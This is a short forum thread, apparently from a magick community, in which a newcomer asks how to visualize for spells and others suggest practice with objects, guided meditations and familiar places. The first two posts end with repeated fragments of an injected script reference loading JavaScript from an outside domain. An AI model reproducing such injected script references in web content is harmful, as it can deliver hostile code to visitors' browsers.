Visualization

Hi! I’m new here and while reading over some potential spells to be the first I cast I’ve noticed that many of them say to “visualize” certain things. How can I do this? I understand the concept of seeing something with my mind’s eye but I don’t understand how to do it. When you see something with your eyes shut. Like shut your eyes and pictures a red apple. You have shut your eyes and been able to see somethings details? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Ok so take a item. Look over it completely. Notice all the small details. Once done shut your eyes and run your hand over the item while trying to picture where your touching it. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

First of all, great question! This kind of stuff is why people say we need to practice before we can effectively work with magick/energy. And you're right, visualization is not something a lot of us can immediately do without practice.

I like the apple suggestion a lot. another thing you could try would be guided meditations. These would be helpful to describe environments/scenarios to imagine yourself in and to practice immersing yourself in those thoughts/images. Another thing I've found helpful in the past is imagining myself in a familiar environment (my favorite park, on the beach) and really trying to recreate every detail in my head.
